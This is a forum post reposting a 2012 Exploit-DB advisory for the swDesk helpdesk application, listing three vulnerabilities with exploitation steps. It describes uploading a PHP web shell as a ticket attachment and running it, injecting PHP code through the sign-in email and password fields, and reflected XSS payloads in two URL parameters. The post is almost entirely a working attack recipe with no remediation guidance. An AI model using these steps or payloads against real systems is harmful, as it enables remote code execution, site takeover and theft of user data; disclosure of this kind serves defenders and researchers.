Jump to content
The_Arhitect

swDesk Multiple Vulnerabilities

Recommended Posts

Posted

swDesk Multiple Vulnerabilities

#
# Title : swDesk Multi Vulnerability
# Author : Red Security TEAM
# Date : 01/02/2012
# Risk : High
# Vendor : http://www.swdesk.com/
# Tested On : Apache
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
#
# I. Arbitrary File Upload Vulnerability
# 1. Go to http://server/create_ticket.php
# 2. Fil all Input Fields And Click on Submit Ticket
# 3. Click on the View Ticket and you should go to the link Like : http://server/view_ticket.php?email=[Your Email]&id=1
# 4. You see Send Message box , Write any thing there and attach your PHP file in the Upload attachment and Click on Send Message
# 5. You can see your attachment above Like : Attachment: shell.php , Click on it and you see your PHP code has been runed
#
# II. PHP Code Injection Vulnerability
# 1. Go to http://server/signin.php : Vulnerability Input Fields : email , password
# 2. Write your php in Input Fields Like : phpi${@print(RedSecurityTEAM)}
#
# III. XSS Vulnerability
# 1. http://server/view_ticket.php?email=example@example.com&id=" onmouseover=alert(1) bad="
# 2. http://server/kb_search.php?keywords=" onmouseover=alert(1) bad="&mode=Search
#
# Thanks To : http://1337day.com/ , http://www.exploit-db.com/ , http://securityreason.com/ , http://packetstormsecurity.org/
#

Sursa: http://www.exploit-db.com/exploits/18443/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...